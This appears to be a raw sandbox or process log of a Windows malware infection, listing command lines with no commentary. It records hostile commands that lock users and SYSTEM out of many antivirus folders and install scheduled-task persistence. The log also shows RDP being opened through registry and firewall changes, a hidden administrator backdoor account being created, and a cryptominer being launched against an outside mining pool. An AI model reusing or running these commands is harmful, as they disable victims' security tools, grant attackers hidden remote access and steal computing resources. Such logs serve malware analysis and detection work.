C:\Programdata\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Programdata\Windows\rutserv.exe
rutserv.exe /start
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\programdata\microsoft\intel\winlogon.exe
"C:\programdata\microsoft\intel\winlogon.exe"
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AC5D.tmp\AC5E.bat C:\programdata\microsoft\intel\winlogon.exe"
C:\Programdata\Windows\rutserv.exe
C:\Programdata\Windows\rutserv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p123
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\programdata\microsoft\intel\Vegas.exe
"C:\programdata\microsoft\intel\Vegas.exe"
C:\programdata\microsoft\intel\MOS.exe
C:\programdata\microsoft\intel\MOS.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)
C:\Program Files (x86)\Windows Mail\WinMail.exe
"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CF56.tmp\CF57.bat C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\olly.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\Iostream.exe /deny Admin:(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\systemreset.exe
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\systemreset.exe /setowner Admin
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\system32\icacls.exe
icacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\OS.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 2
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe
"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\ProgramData\WindowsTask\AppHost.exe
C:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t4
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\users\john"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls D:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls E:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls K:\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\disk /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Logs /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls c:\windows\min /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)
